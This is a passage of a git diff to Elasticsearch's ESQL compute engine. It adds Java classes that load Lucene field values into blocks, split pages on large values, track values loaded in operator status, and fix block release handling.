one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; +import java.util.ArrayList; +import java.util.List; + +/** + * Loads values from a single leaf. Much more efficient than {@link ValuesFromManyReader}. + */ +class ValuesFromSingleReader extends ValuesReader { + private static final Logger log = LogManager.getLogger(ValuesFromSingleReader.class); + + /** + * Minimum number of documents for which it is more efficient to use a + * sequential stored field reader when reading stored fields. + *

+ * The sequential stored field reader decompresses a whole block of docs + * at a time so for very short lists it won't be faster to use it. We use + * {@code 10} documents as the boundary for "very short" because it's what + * search does, not because we've done extensive testing on the number. + *

+ */ + static final int SEQUENTIAL_BOUNDARY = 10; + + private final int shard; + private final int segment; + + ValuesFromSingleReader(ValuesSourceReaderOperator operator, DocVector docs) { + super(operator, docs); + this.shard = docs.shards().getInt(0); + this.segment = docs.segments().getInt(0); + log.debug("initialized {} positions", docs.getPositionCount()); + } + + @Override + protected void load(Block[] target, int offset) throws IOException { + if (docs.singleSegmentNonDecreasing()) { + loadFromSingleLeaf(operator.jumboBytes, target, new ValuesReaderDocs(docs), offset); + return; + } + if (offset != 0) { + throw new IllegalStateException("can only load partial pages with single-segment non-decreasing pages"); + } + int[] forwards = docs.shardSegmentDocMapForwards(); + Block[] unshuffled = new Block[target.length]; + try { + loadFromSingleLeaf( + Long.MAX_VALUE, // Effectively disable splitting pages when we're not loading in order + unshuffled, + new ValuesReaderDocs(docs).mapped(forwards), + 0 + ); + final int[] backwards = docs.shardSegmentDocMapBackwards(); + for (int i = 0; i < unshuffled.length; i++) { + target[i] = unshuffled[i].filter(backwards); + unshuffled[i].close(); + unshuffled[i] = null; + } + } finally { + Releasables.closeExpectNoException(unshuffled); + } + } + + private void loadFromSingleLeaf(long jumboBytes, Block[] target, ValuesReaderDocs docs, int offset) throws IOException { + int firstDoc = docs.get(offset); + operator.positionFieldWork(shard, segment, firstDoc); + StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; + LeafReaderContext ctx = operator.ctx(shard, segment); + + List columnAtATimeReaders = new ArrayList<>(operator.fields.length); + List rowStrideReaders = new ArrayList<>(operator.fields.length); + try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(operator.blockFactory)) { + for (int f = 0; f < operator.fields.length; f++) { + ValuesSourceReaderOperator.FieldWork field = operator.fields[f]; + BlockLoader.ColumnAtATimeReader columnAtATime = field.columnAtATime(ctx); + if (columnAtATime != null) { + columnAtATimeReaders.add(new ColumnAtATimeWork(columnAtATime, f)); + } else { + rowStrideReaders.add( + new RowStrideReaderWork( + field.rowStride(ctx), + (Block.Builder) field.loader.builder(loaderBlockFactory, docs.count() - offset), + field.loader, + f + ) + ); + storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); + } + } + + if (rowStrideReaders.isEmpty() == false) { + loadFromRowStrideReaders(jumboBytes, target, storedFieldsSpec, rowStrideReaders, ctx, docs, offset); + } + for (ColumnAtATimeWork r : columnAtATimeReaders) { + target[r.idx] = (Block) r.reader.read(loaderBlockFactory, docs, offset); + operator.sanityCheckBlock(r.reader, docs.count() - offset, target[r.idx], r.idx); + } + if (log.isDebugEnabled()) { + long total = 0; + for (Block b : target) { + total += b.ramBytesUsed(); + } + log.debug("loaded {} positions total ({} bytes)", target[0].getPositionCount(), total); + } + } finally { + Releasables.close(rowStrideReaders); + } + } + + private void loadFromRowStrideReaders( + long jumboBytes, + Block[] target, + StoredFieldsSpec storedFieldsSpec, + List rowStrideReaders, + LeafReaderContext ctx, + ValuesReaderDocs docs, + int offset + ) throws IOException { + SourceLoader sourceLoader = null; + ValuesSourceReaderOperator.ShardContext shardContext = operator.shardContexts.get(shard); + if (storedFieldsSpec.requiresSource()) { + sourceLoader = shardContext.newSourceLoader().get(); + storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); + } + if (storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { + throw new IllegalStateException( + "found row stride readers [" + rowStrideReaders + "] without stored fields [" + storedFieldsSpec + "]" + ); + } + StoredFieldLoader storedFieldLoader; + if (useSequentialStoredFieldsReader(docs, shardContext.storedFieldsSequentialProportion())) { + storedFieldLoader = StoredFieldLoader.fromSpecSequential(storedFieldsSpec); + operator.trackStoredFields(storedFieldsSpec, true); + } else { + storedFieldLoader = StoredFieldLoader.fromSpec(storedFieldsSpec); + operator.trackStoredFields(storedFieldsSpec, false); + } + BlockLoaderStoredFieldsFromLeafLoader storedFields = new BlockLoaderStoredFieldsFromLeafLoader( + storedFieldLoader.getLoader(ctx, null), + sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null + ); + int p = offset; + long estimated = 0; + while (p < docs.count() && estimated < jumboBytes) { + int doc = docs.get(p++); + storedFields.advanceTo(doc); + for (RowStrideReaderWork work : rowStrideReaders) { + work.read(doc, storedFields); + } + estimated = estimatedRamBytesUsed(rowStrideReaders); + log.trace("{}: bytes loaded {}/{}", p, estimated, jumboBytes); + } + for (RowStrideReaderWork work : rowStrideReaders) { + target[work.idx] = work.build(); + operator.sanityCheckBlock(work.reader, p - offset, target[work.idx], work.idx); + } + if (log.isDebugEnabled()) { + long actual = 0; + for (RowStrideReaderWork work : rowStrideReaders) { + actual += target[work.idx].ramBytesUsed(); + } + log.debug("loaded {} positions row stride estimated/actual {}/{} bytes", p - offset, estimated, actual); + } + docs.setCount(p); + } + + /** + * Is it more efficient to use a sequential stored field reader + * when reading stored fields for the documents contained in {@code docIds}? + */ + private boolean useSequentialStoredFieldsReader(BlockLoader.Docs docs, double storedFieldsSequentialProportion) { + int count = docs.count(); + if (count < SEQUENTIAL_BOUNDARY) { + return false; + } + int range = docs.get(count - 1) - docs.get(0); + return range * storedFieldsSequentialProportion <= count; + } + + /** + * Work for building a column-at-a-time. + * @param reader reads the values + * @param idx destination in array of {@linkplain Block}s we build + */ + private record ColumnAtATimeWork(BlockLoader.ColumnAtATimeReader reader, int idx) {} + + /** + * Work for + * @param reader + * @param builder + * @param loader + * @param idx + */ + private record RowStrideReaderWork(BlockLoader.RowStrideReader reader, Block.Builder builder, BlockLoader loader, int idx) + implements + Releasable { + void read(int doc, BlockLoaderStoredFieldsFromLeafLoader storedFields) throws IOException { + reader.read(doc, storedFields, builder); + } + + Block build() { + return (Block) loader.convert(builder.build()); + } + + @Override + public void close() { + builder.close(); + } + } + + private long estimatedRamBytesUsed(List rowStrideReaders) { + long estimated = 0; + for (RowStrideReaderWork r : rowStrideReaders) { + estimated += r.builder.estimatedBytes(); + } + return estimated; + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java new file mode 100644 index 0000000000000..d3b8b0edcec3d --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java @@ -0,0 +1,58 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.core.Releasables; + +import java.io.IOException; +import java.io.UncheckedIOException; + +public abstract class ValuesReader implements ReleasableIterator { + protected final ValuesSourceReaderOperator operator; + protected final DocVector docs; + private int offset; + + ValuesReader(ValuesSourceReaderOperator operator, DocVector docs) { + this.operator = operator; + this.docs = docs; + } + + @Override + public boolean hasNext() { + return offset < docs.getPositionCount(); + } + + @Override + public Block[] next() { + Block[] target = new Block[operator.fields.length]; + boolean success = false; + try { + load(target, offset); + success = true; + for (Block b : target) { + operator.valuesLoaded += b.getTotalValueCount(); + } + offset += target[0].getPositionCount(); + return target; + } catch (IOException e) { + throw new UncheckedIOException(e); + } finally { + if (success == false) { + Releasables.closeExpectNoException(target); + } + } + } + + protected abstract void load(Block[] target, int offset) throws IOException; + + @Override + public void close() {} +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java new file mode 100644 index 0000000000000..2e138dc2d0446 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java @@ -0,0 +1,69 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.index.mapper.BlockLoader; + +/** + * Implementation of {@link BlockLoader.Docs} for ESQL. It's important that + * only this implementation, and the implementation returned by {@link #mapped} + * exist. This allows the jvm to inline the {@code invokevirtual}s to call + * the interface in hot, hot code. + *

+ * We've investigated moving the {@code offset} parameter from the + * {@link BlockLoader.ColumnAtATimeReader#read} into this. That's more + * readable, but a clock cycle slower. + *

+ *

+ * When we tried having a {@link Nullable} map member instead of a subclass + * that was also slower. + *

+ */ +class ValuesReaderDocs implements BlockLoader.Docs { + private final DocVector docs; + private int count; + + ValuesReaderDocs(DocVector docs) { + this.docs = docs; + this.count = docs.getPositionCount(); + } + + final Mapped mapped(int[] forwards) { + return new Mapped(docs, forwards); + } + + public final void setCount(int count) { + this.count = count; + } + + @Override + public final int count() { + return count; + } + + @Override + public int get(int i) { + return docs.docs().getInt(i); + } + + private class Mapped extends ValuesReaderDocs { + private final int[] forwards; + + private Mapped(DocVector docs, int[] forwards) { + super(docs); + this.forwards = forwards; + } + + @Override + public int get(int i) { + return super.get(forwards[i]); + } + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java new file mode 100644 index 0000000000000..6d0ebb9c312d0 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java @@ -0,0 +1,327 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.IndexReader; +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.DocBlock; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.compute.data.ElementType; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.Operator; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; +import java.util.List; +import java.util.Map; +import java.util.TreeMap; +import java.util.function.IntFunction; +import java.util.function.Supplier; + +/** + * Operator that extracts doc_values from a Lucene index out of pages that have been produced by {@link LuceneSourceOperator} + * and outputs them to a new column. + */ +public class ValuesSourceReaderOperator extends AbstractPageMappingToIteratorOperator { + /** + * Creates a factory for {@link ValuesSourceReaderOperator}. + * @param fields fields to load + * @param shardContexts per-shard loading information + * @param docChannel the channel containing the shard, leaf/segment and doc id + */ + public record Factory(ByteSizeValue jumboSize, List fields, List shardContexts, int docChannel) + implements + OperatorFactory { + public Factory { + if (fields.isEmpty()) { + throw new IllegalStateException("ValuesSourceReaderOperator doesn't support empty fields"); + } + } + + @Override + public Operator get(DriverContext driverContext) { + return new ValuesSourceReaderOperator(driverContext.blockFactory(), jumboSize.getBytes(), fields, shardContexts, docChannel); + } + + @Override + public String describe() { + StringBuilder sb = new StringBuilder(); + sb.append("ValuesSourceReaderOperator[fields = ["); + if (fields.size() < 10) { + boolean first = true; + for (FieldInfo f : fields) { + if (first) { + first = false; + } else { + sb.append(", "); + } + sb.append(f.name); + } + } else { + sb.append(fields.size()).append(" fields"); + } + return sb.append("]]").toString(); + } + } + + /** + * Configuration for a field to load. + * + * {@code blockLoader} maps shard index to the {@link BlockLoader}s + * which load the actual blocks. + */ + public record FieldInfo(String name, ElementType type, IntFunction blockLoader) {} + + public record ShardContext(IndexReader reader, Supplier newSourceLoader, double storedFieldsSequentialProportion) {} + + final BlockFactory blockFactory; + /** + * When the loaded fields {@link Block}s' estimated size grows larger than this, + * we finish loading the {@linkplain Page} and return it, even if + * the {@linkplain Page} is shorter than the incoming {@linkplain Page}. + *

+ * NOTE: This only applies when loading single segment non-descending + * row stride bytes. This is the most common way to get giant fields, + * but it isn't all the ways. + *

+ */ + final long jumboBytes; + final FieldWork[] fields; + final List shardContexts; + private final int docChannel; + + private final Map readersBuilt = new TreeMap<>(); + long valuesLoaded; + + private int lastShard = -1; + private int lastSegment = -1; + + /** + * Creates a new extractor + * @param fields fields to load + * @param docChannel the channel containing the shard, leaf/segment and doc id + */ + public ValuesSourceReaderOperator( + BlockFactory blockFactory, + long jumboBytes, + List fields, + List shardContexts, + int docChannel + ) { + if (fields.isEmpty()) { + throw new IllegalStateException("ValuesSourceReaderOperator doesn't support empty fields"); + } + this.blockFactory = blockFactory; + this.jumboBytes = jumboBytes; + this.fields = fields.stream().map(FieldWork::new).toArray(FieldWork[]::new); + this.shardContexts = shardContexts; + this.docChannel = docChannel; + } + + @Override + protected ReleasableIterator receive(Page page) { + DocVector docVector = page.getBlock(docChannel).asVector(); + return appendBlockArrays( + page, + docVector.singleSegment() ? new ValuesFromSingleReader(this, docVector) : new ValuesFromManyReader(this, docVector) + ); + } + + void positionFieldWork(int shard, int segment, int firstDoc) { + if (lastShard == shard) { + if (lastSegment == segment) { + for (FieldWork w : fields) { + w.sameSegment(firstDoc); + } + return; + } + lastSegment = segment; + for (FieldWork w : fields) { + w.sameShardNewSegment(); + } + return; + } + lastShard = shard; + lastSegment = segment; + for (FieldWork w : fields) { + w.newShard(shard); + } + } + + boolean positionFieldWorkDocGuaranteedAscending(int shard, int segment) { + if (lastShard == shard) { + if (lastSegment == segment) { + return false; + } + lastSegment = segment; + for (FieldWork w : fields) { + w.sameShardNewSegment(); + } + return true; + } + lastShard = shard; + lastSegment = segment; + for (FieldWork w : fields) { + w.newShard(shard); + } + return true; + } + + void trackStoredFields(StoredFieldsSpec spec, boolean sequential) { + readersBuilt.merge( + "stored_fields[" + + "requires_source:" + + spec.requiresSource() + + ", fields:" + + spec.requiredStoredFields().size() + + ", sequential: " + + sequential + + "]", + 1, + (prev, one) -> prev + one + ); + } + + protected class FieldWork { + final FieldInfo info; + + BlockLoader loader; + BlockLoader.ColumnAtATimeReader columnAtATime; + BlockLoader.RowStrideReader rowStride; + + FieldWork(FieldInfo info) { + this.info = info; + } + + void sameSegment(int firstDoc) { + if (columnAtATime != null && columnAtATime.canReuse(firstDoc) == false) { + columnAtATime = null; + } + if (rowStride != null && rowStride.canReuse(firstDoc) == false) { + rowStride = null; + } + } + + void sameShardNewSegment() { + columnAtATime = null; + rowStride = null; + } + + void newShard(int shard) { + loader = info.blockLoader.apply(shard); + columnAtATime = null; + rowStride = null; + } + + BlockLoader.ColumnAtATimeReader columnAtATime(LeafReaderContext ctx) throws IOException { + if (columnAtATime == null) { + columnAtATime = loader.columnAtATimeReader(ctx); + trackReader("column_at_a_time", this.columnAtATime); + } + return columnAtATime; + } + + BlockLoader.RowStrideReader rowStride(LeafReaderContext ctx) throws IOException { + if (rowStride == null) { + rowStride = loader.rowStrideReader(ctx); + trackReader("row_stride", this.rowStride); + } + return rowStride; + } + + private void trackReader(String type, BlockLoader.Reader reader) { + readersBuilt.merge(info.name + ":" + type + ":" + reader, 1, (prev, one) -> prev + one); + } + } + + LeafReaderContext ctx(int shard, int segment) { + return shardContexts.get(shard).reader().leaves().get(segment); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("ValuesSourceReaderOperator[fields = ["); + if (fields.length < 10) { + boolean first = true; + for (FieldWork f : fields) { + if (first) { + first = false; + } else { + sb.append(", "); + } + sb.append(f.info.name); + } + } else { + sb.append(fields.length).append(" fields"); + } + return sb.append("]]").toString(); + } + + @Override + protected ValuesSourceReaderOperatorStatus status( + long processNanos, + int pagesReceived, + int pagesEmitted, + long rowsReceived, + long rowsEmitted + ) { + return new ValuesSourceReaderOperatorStatus( + new TreeMap<>(readersBuilt), + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); + } + + /** + * Quick checks for on the loaded block to make sure it looks reasonable. + * @param loader the object that did the loading - we use it to make error messages if the block is busted + * @param expectedPositions how many positions the block should have - it's as many as the incoming {@link Page} has + * @param block the block to sanity check + * @param field offset into the {@link #fields} array for the block being loaded + */ + void sanityCheckBlock(Object loader, int expectedPositions, Block block, int field) { + if (block.getPositionCount() != expectedPositions) { + throw new IllegalStateException( + sanityCheckBlockErrorPrefix(loader, block, field) + + " has [" + + block.getPositionCount() + + "] positions instead of [" + + expectedPositions + + "]" + ); + } + if (block.elementType() != ElementType.NULL && block.elementType() != fields[field].info.type) { + throw new IllegalStateException( + sanityCheckBlockErrorPrefix(loader, block, field) + + "'s element_type [" + + block.elementType() + + "] NOT IN (NULL, " + + fields[field].info.type + + ")" + ); + } + } + + private String sanityCheckBlockErrorPrefix(Object loader, Block block, int field) { + return fields[field].info.name + "[" + loader + "]: " + block; + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java new file mode 100644 index 0000000000000..4a8fcda81f82a --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java @@ -0,0 +1,159 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.TransportVersion; +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.compute.operator.AbstractPageMappingOperator; +import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; +import org.elasticsearch.compute.operator.Operator; +import org.elasticsearch.xcontent.XContentBuilder; + +import java.io.IOException; +import java.util.Map; +import java.util.Objects; + +import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED; +import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES_8_19; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES_9_1; + +public class ValuesSourceReaderOperatorStatus extends AbstractPageMappingToIteratorOperator.Status { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + Operator.Status.class, + "values_source_reader", + ValuesSourceReaderOperatorStatus::readFrom + ); + + private final Map readersBuilt; + private final long valuesLoaded; + + public ValuesSourceReaderOperatorStatus( + Map readersBuilt, + long processNanos, + int pagesReceived, + int pagesEmitted, + long rowsReceived, + long rowsEmitted, + long valuesLoaded + ) { + super(processNanos, pagesReceived, pagesEmitted, rowsReceived, rowsEmitted); + this.readersBuilt = readersBuilt; + this.valuesLoaded = valuesLoaded; + } + + static ValuesSourceReaderOperatorStatus readFrom(StreamInput in) throws IOException { + long processNanos; + int pagesReceived; + int pagesEmitted; + long rowsReceived; + long rowsEmitted; + if (supportsSplitOnBigValues(in.getTransportVersion())) { + AbstractPageMappingToIteratorOperator.Status status = new AbstractPageMappingToIteratorOperator.Status(in); + processNanos = status.processNanos(); + pagesReceived = status.pagesReceived(); + pagesEmitted = status.pagesEmitted(); + rowsReceived = status.rowsReceived(); + rowsEmitted = status.rowsEmitted(); + } else { + AbstractPageMappingOperator.Status status = new AbstractPageMappingOperator.Status(in); + processNanos = status.processNanos(); + pagesReceived = status.pagesProcessed(); + pagesEmitted = status.pagesProcessed(); + rowsReceived = status.rowsReceived(); + rowsEmitted = status.rowsEmitted(); + } + Map readersBuilt = in.readOrderedMap(StreamInput::readString, StreamInput::readVInt); + long valuesLoaded = supportsValuesLoaded(in.getTransportVersion()) ? in.readVLong() : 0; + return new ValuesSourceReaderOperatorStatus( + readersBuilt, + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + if (supportsSplitOnBigValues(out.getTransportVersion())) { + super.writeTo(out); + } else { + /* + * Before we knew how to split pages when reading large values + * our status just contained one int per page - just like AbstractPageMappingOperator.Status. + */ + new AbstractPageMappingOperator.Status(processNanos(), pagesEmitted(), rowsReceived(), rowsEmitted()).writeTo(out); + } + out.writeMap(readersBuilt, StreamOutput::writeVInt); + if (supportsValuesLoaded(out.getTransportVersion())) { + out.writeVLong(valuesLoaded); + } + } + + private static boolean supportsSplitOnBigValues(TransportVersion version) { + return version.onOrAfter(ESQL_SPLIT_ON_BIG_VALUES) + || version.isPatchFrom(ESQL_SPLIT_ON_BIG_VALUES_9_1) + || version.isPatchFrom(ESQL_SPLIT_ON_BIG_VALUES_8_19); + } + + private static boolean supportsValuesLoaded(TransportVersion version) { + return version.onOrAfter(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED) + || version.isPatchFrom(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19); + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + public Map readersBuilt() { + return readersBuilt; + } + + @Override + public long valuesLoaded() { + return valuesLoaded; + } + + @Override + public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { + builder.startObject(); + builder.startObject("readers_built"); + for (Map.Entry e : readersBuilt.entrySet()) { + builder.field(e.getKey(), e.getValue()); + } + builder.endObject(); + builder.field("values_loaded", valuesLoaded); + innerToXContent(builder); + return builder.endObject(); + } + + @Override + public boolean equals(Object o) { + if (super.equals(o) == false) return false; + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) o; + return readersBuilt.equals(status.readersBuilt) && valuesLoaded == status.valuesLoaded; + } + + @Override + public int hashCode() { + return Objects.hash(super.hashCode(), readersBuilt, valuesLoaded); + } + + @Override + public String toString() { + return Strings.toString(this); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java index d0b4aaad22a3e..84affa27dc5ec 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java @@ -127,7 +127,7 @@ public Status(long processNanos, int pagesProcessed, long rowsReceived, long row this.rowsEmitted = rowsEmitted; } - protected Status(StreamInput in) throws IOException { + public Status(StreamInput in) throws IOException { processNanos = in.getTransportVersion().onOrAfter(TransportVersions.V_8_14_0) ? in.readVLong() : 0; pagesProcessed = in.readVInt(); if (in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_ROWS_PROCESSED)) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java index 6a165fdfa055b..491885d5fae72 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java @@ -64,13 +64,38 @@ public abstract class AbstractPageMappingToIteratorOperator implements Operator */ protected abstract ReleasableIterator receive(Page page); + /** + * Append an {@link Iterator} of arrays of {@link Block}s to a + * {@link Page}, one after the other. It's required that the + * iterator emit as many positions as there were + * in the page. + */ + public static ReleasableIterator appendBlockArrays(Page page, ReleasableIterator toAdd) { + return new AppendBlocksIterator(page, toAdd); + } + /** * Append an {@link Iterator} of {@link Block}s to a {@link Page}, one * after the other. It's required that the iterator emit as many * positions as there were in the page. */ public static ReleasableIterator appendBlocks(Page page, ReleasableIterator toAdd) { - return new AppendBlocksIterator(page, toAdd); + return appendBlockArrays(page, new ReleasableIterator<>() { + @Override + public boolean hasNext() { + return toAdd.hasNext(); + } + + @Override + public Block[] next() { + return new Block[] { toAdd.next() }; + } + + @Override + public void close() { + toAdd.close(); + } + }); } @Override @@ -86,13 +111,24 @@ public final void addInput(Page page) { if (next != null) { assert next.hasNext() == false : "has pending input page"; next.close(); + next = null; } if (page.getPositionCount() == 0) { return; } - next = new RuntimeTrackingIterator(receive(page)); - pagesReceived++; - rowsReceived += page.getPositionCount(); + try { + next = new RuntimeTrackingIterator(receive(page)); + pagesReceived++; + rowsReceived += page.getPositionCount(); + } finally { + if (next == null) { + /* + * The `receive` operation failed, we need to release the incoming page + * because it's no longer owned by anyone. + */ + page.releaseBlocks(); + } + } } @Override @@ -166,7 +202,7 @@ public static class Status implements Operator.Status { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( Operator.Status.class, "page_mapping_to_iterator", - AbstractPageMappingOperator.Status::new + Status::new ); private final long processNanos; @@ -183,7 +219,7 @@ public Status(long processNanos, int pagesProcessed, int pagesEmitted, long rows this.rowsEmitted = rowsEmitted; } - protected Status(StreamInput in) throws IOException { + public Status(StreamInput in) throws IOException { processNanos = in.readVLong(); pagesReceived = in.readVInt(); pagesEmitted = in.readVInt(); @@ -284,11 +320,12 @@ public TransportVersion getMinimalSupportedVersion() { private static class AppendBlocksIterator implements ReleasableIterator { private final Page page; - private final ReleasableIterator next; + private final ReleasableIterator next; + private boolean closed = false; private int positionOffset; - protected AppendBlocksIterator(Page page, ReleasableIterator next) { + protected AppendBlocksIterator(Page page, ReleasableIterator next) { this.page = page; this.next = next; } @@ -305,17 +342,25 @@ public final boolean hasNext() { @Override public final Page next() { - Block read = next.next(); + Block[] read = next.next(); int start = positionOffset; - positionOffset += read.getPositionCount(); - if (start == 0 && read.getPositionCount() == page.getPositionCount()) { + positionOffset += read[0].getPositionCount(); + if (start == 0 && read[0].getPositionCount() == page.getPositionCount()) { for (int b = 0; b < page.getBlockCount(); b++) { page.getBlock(b).incRef(); } - return page.appendBlock(read); + final Page result = page.appendBlocks(read); + // We need to release the blocks of the page in this iteration instead of delaying to the next, + // because the blocks of this page are now shared with the output page. The output page can be + // passed to a separate driver, which may run concurrently with this driver, leading to data races + // of references in AbstractNonThreadSafeRefCounted, which is not thread-safe. + // An alternative would be to make RefCounted for Vectors/Blocks thread-safe when they are about + // to be shared with other drivers via #allowPassingToDifferentDriver. + close(); + return result; } - Block[] newBlocks = new Block[page.getBlockCount() + 1]; - newBlocks[page.getBlockCount()] = read; + Block[] newBlocks = new Block[page.getBlockCount() + read.length]; + System.arraycopy(read, 0, newBlocks, page.getBlockCount(), read.length); try { // TODO a way to filter with a range please. int[] positions = IntStream.range(start, positionOffset).toArray(); @@ -332,7 +377,10 @@ public final Page next() { @Override public void close() { - Releasables.closeExpectNoException(page::releaseBlocks, next); + if (closed == false) { + closed = true; + Releasables.closeExpectNoException(page::releaseBlocks, next); + } } } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java index 4e06c1f0f4b69..05f60c1b6834d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java @@ -14,7 +14,7 @@ /** * {@link Block#lookup Looks up} values from a provided {@link Block} and - * mergeds them into each {@link Page}. + * merged them into each {@link Page}. */ public class ColumnLoadOperator extends 